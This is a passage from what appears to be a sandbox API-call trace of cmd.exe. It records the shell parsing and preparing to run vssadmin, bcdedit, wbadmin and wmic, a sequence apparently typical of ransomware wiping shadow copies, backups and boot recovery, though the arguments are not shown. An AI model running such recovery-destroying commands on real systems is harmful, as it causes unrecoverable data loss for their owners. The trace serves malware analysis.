(_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0069.284] GetProcessHeap () returned 0x460000 [0069.284] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x54) returned 0x4758b0 [0069.284] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x36f754 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.284] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x36f754, lpFilePart=0x36f750 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x36f750*="Desktop") returned 0x25 [0069.284] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.284] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x36f4d0 | out: lpFindFileData=0x36f4d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4720c8 [0069.284] FindClose (in: hFindFile=0x4720c8 | out: hFindFile=0x4720c8) returned 1 [0069.284] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x36f4d0 | out: lpFindFileData=0x36f4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x963e2b90, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x963e2b90, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4720c8 [0069.284] FindClose (in: hFindFile=0x4720c8 | out: hFindFile=0x4720c8) returned 1 [0069.284] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0069.285] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x36f4d0 | out: lpFindFileData=0x36f4d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4720c8 [0069.285] FindClose (in: hFindFile=0x4720c8 | out: hFindFile=0x4720c8) returned 1 [0069.285] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.285] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0069.285] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0069.285] GetProcessHeap () returned 0x460000 [0069.285] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474dc0 | out: hHeap=0x460000) returned 1 [0069.285] GetEnvironmentStringsW () returned 0x4742d0* [0069.285] GetProcessHeap () returned 0x460000 [0069.285] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb36) returned 0x475910 [0069.285] FreeEnvironmentStringsW (penv=0x4742d0) returned 1 [0069.285] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.285] GetProcessHeap () returned 0x460000 [0069.285] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4758b0 | out: hHeap=0x460000) returned 1 [0069.285] GetProcessHeap () returned 0x460000 [0069.285] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400e) returned 0x476450 [0069.286] GetProcessHeap () returned 0x460000 [0069.286] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x19e) returned 0x460ff0 [0069.286] GetProcessHeap () returned 0x460000 [0069.286] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x476450 | out: hHeap=0x460000) returned 1 [0069.286] GetConsoleOutputCP () returned 0x1b5 [0069.669] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.669] GetUserDefaultLCID () returned 0x409 [0069.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0069.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x36f894, cchData=128 | out: lpLCData="0") returned 2 [0069.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x36f894, cchData=128 | out: lpLCData="0") returned 2 [0069.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x36f894, cchData=128 | out: lpLCData="1") returned 2 [0069.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0069.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.671] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.671] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.671] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0069.671] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.671] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.671] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.671] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0069.671] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0069.671] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.672] GetProcessHeap () returned 0x460000 [0069.672] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x20c) returned 0x472fa0 [0069.672] GetConsoleTitleW (in: lpConsoleTitle=0x472fa0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.673] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.673] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0069.673] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0069.673] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0069.673] GetProcessHeap () returned 0x460000 [0069.673] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400a) returned 0x476450 [0069.674] GetProcessHeap () returned 0x460000 [0069.674] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x476450 | out: hHeap=0x460000) returned 1 [0069.674] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77 [0069.674] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0069.674] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0069.674] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0069.674] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0069.675] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0069.675] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0069.675] GetProcessHeap () returned 0x460000 [0069.675] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x461198 [0069.675] GetProcessHeap () returned 0x460000 [0069.675] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x22) returned 0x4611f8 [0069.675] GetProcessHeap () returned 0x460000 [0069.675] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x42) returned 0x461228 [0069.676] GetProcessHeap () returned 0x460000 [0069.676] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x4731b8 [0069.676] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0069.676] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0069.676] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0069.676] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0069.677] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0069.677] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0069.677] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0069.677] GetProcessHeap () returned 0x460000 [0069.677] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x473218 [0069.677] GetProcessHeap () returned 0x460000 [0069.677] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x18) returned 0x461278 [0069.678] GetProcessHeap () returned 0x460000 [0069.678] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x70) returned 0x473278 [0069.678] GetProcessHeap () returned 0x460000 [0069.678] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x4732f0 [0069.679] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0069.679] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0069.679] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0069.679] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0069.679] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0069.679] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0069.679] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0069.679] GetProcessHeap () returned 0x460000 [0069.679] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x473350 [0069.679] GetProcessHeap () returned 0x460000 [0069.679] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x18) returned 0x461298 [0069.680] GetProcessHeap () returned 0x460000 [0069.680] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x50) returned 0x4733b0 [0069.680] GetProcessHeap () returned 0x460000 [0069.680] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x473408 [0069.681] _wcsicmp (_String1="wbadmin", _String2=")") returned 78 [0069.681] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17 [0069.681] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17 [0069.681] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14 [0069.681] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14 [0069.681] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5 [0069.681] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5 [0069.681] GetProcessHeap () returned 0x460000 [0069.681] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x473468 [0069.681] GetProcessHeap () returned 0x460000 [0069.681] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x18) returned 0x4734c8 [0069.682] GetProcessHeap () returned 0x460000 [0069.682] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x38) returned 0x4734e8 [0069.682] GetProcessHeap () returned 0x460000 [0069.682] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x473528 [0069.683] _wcsicmp (_String1="wmic", _String2=")") returned 78 [0069.683] _wcsicmp (_String1="FOR", _String2="wmic") returned -17 [0069.683] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17 [0069.683] _wcsicmp (_String1="IF", _String2="wmic") returned -14 [0069.683] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14 [0069.683] _wcsicmp (_String1="REM", _String2="wmic") returned -5 [0069.683] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5 [0069.683] GetProcessHeap () returned 0x460000 [0069.683] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x473588 [0069.683] GetProcessHeap () returned 0x460000 [0069.683] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x12) returned 0x4735e8 [0069.683] GetProcessHeap () returned 0x460000 [0069.683] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x2e) returned 0x473608 [0069.684] GetConsoleTitleW (in: lpConsoleTitle=0x36f528, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.684] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vssadmin.exe")) returned 0xffffffff [0069.685] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0069.685] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0069.685] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0069.685] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0069.685] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0069.685] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0069.685] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0069.685] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0069.685] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0069.685] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0069.685] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0069.685] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0069.685] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0069.685] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0069.685] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0069.685] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0069.685] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0069.685] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0069.685] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0069.685] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0069.685] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0069.685] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0069.685] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0069.685] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0069.685] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0069.685] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0069.685] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0069.685] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0069.685] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0069.685] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0069.685] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0069.685] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0069.686] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0069.686] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0069.686] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0069.686] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0069.686] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0069.686] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0069.686] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0069.686] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0069.686] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0069.686] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0069.686] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0069.686] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0069.686] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0069.686] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0069.686] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0069.686] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0069.686] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0069.686] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0069.686] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0069.686] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0069.686] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0069.686] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0069.686] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0069.686] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0069.686] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0069.686] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0069.686] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0069.686] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0069.686] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0069.686] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0069.686] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0069.686] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0069.686] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0069.686] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0069.686] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0069.686] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0069.687] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0069.687] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0069.687] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0069.687] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0069.687] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0069.687] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0069.687] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0069.687] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0069.687] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0069.687] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0069.687] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0069.687] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0069.687] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0069.687] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0069.687] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0069.687] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0069.687] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0069.687] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0069.687] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0069.688] GetProcessHeap () returned 0x460000 [0069.688] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x210) returned 0x4742d0 [0069.688] GetProcessHeap () returned 0x460000 [0069.688] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x5c) returned 0x473640 [0069.688] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0069.688] GetProcessHeap () returned 0x460000 [0069.688] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x418) returned 0x4744e8 [0069.688] SetErrorMode (uMode=0x0) returned 0x0 [0069.688] SetErrorMode (uMode=0x1) returned 0x0 [0069.688] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4744f0, lpFilePart=0x36f048 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x36f048*="Desktop") returned 0x25 [0069.688] SetErrorMode (uMode=0x0) returned 0x1 [0069.688] GetProcessHeap () returned 0x460000 [0069.688] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x4744e8, Size=0x6e) returned 0x4744e8 [0069.688] GetProcessHeap () returned 0x460000 [0069.688] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x4744e8) returned 0x6e [0069.688] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.688] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0069.688] GetProcessHeap () returned 0x460000 [0069.688] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x120) returned 0x4736a8 [0069.689] GetProcessHeap () returned 0x460000 [0069.689] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x238) returned 0x474560 [0069.693] GetProcessHeap () returned 0x460000 [0069.693] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x474560, Size=0x122) returned 0x474560 [0069.693] GetProcessHeap () returned 0x460000 [0069.693] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474560) returned 0x122 [0069.693] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.693] GetProcessHeap () returned 0x460000 [0069.693] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe0) returned 0x474690 [0069.693] GetProcessHeap () returned 0x460000 [0069.693] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x474690, Size=0x76) returned 0x474690 [0069.693] GetProcessHeap () returned 0x460000 [0069.693] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474690) returned 0x76 [0069.694] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.694] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x36ede4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ede4) returned 0xffffffff [0069.694] GetLastError () returned 0x2 [0069.694] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x36edc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36edc4) returned 0xffffffff [0069.694] GetLastError () returned 0x2 [0069.694] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x36edc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36edc4) returned 0xffffffff [0069.694] GetLastError () returned 0x2 [0069.694] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x36ede4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ede4) returned 0x474710 [0069.694] GetProcessHeap () returned 0x460000 [0069.694] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x14) returned 0x4737d0 [0069.694] FindClose (in: hFindFile=0x474710 | out: hFindFile=0x474710) returned 1 [0069.695] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0069.695] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0069.695] GetConsoleTitleW (in: lpConsoleTitle=0x36f2bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.695] InitializeProcThreadAttributeList (in: lpAttributeList=0x36f144, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x36f20c | out: lpAttributeList=0x36f144, lpSize=0x36f20c) returned 1 [0069.695] UpdateProcThreadAttribute (in: lpAttributeList=0x36f144, dwFlags=0x0, Attribute=0x60001, lpValue=0x36f204, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x36f144, lpPreviousValue=0x0) returned 1 [0069.695] GetStartupInfoW (in: lpStartupInfo=0x36f100 | out: lpStartupInfo=0x36f100*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0069.695] GetProcessHeap () returned 0x460000 [0069.695] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x18) returned 0x474710 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.695] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.696] _wcsnicmp (_String1="COPYCMD", 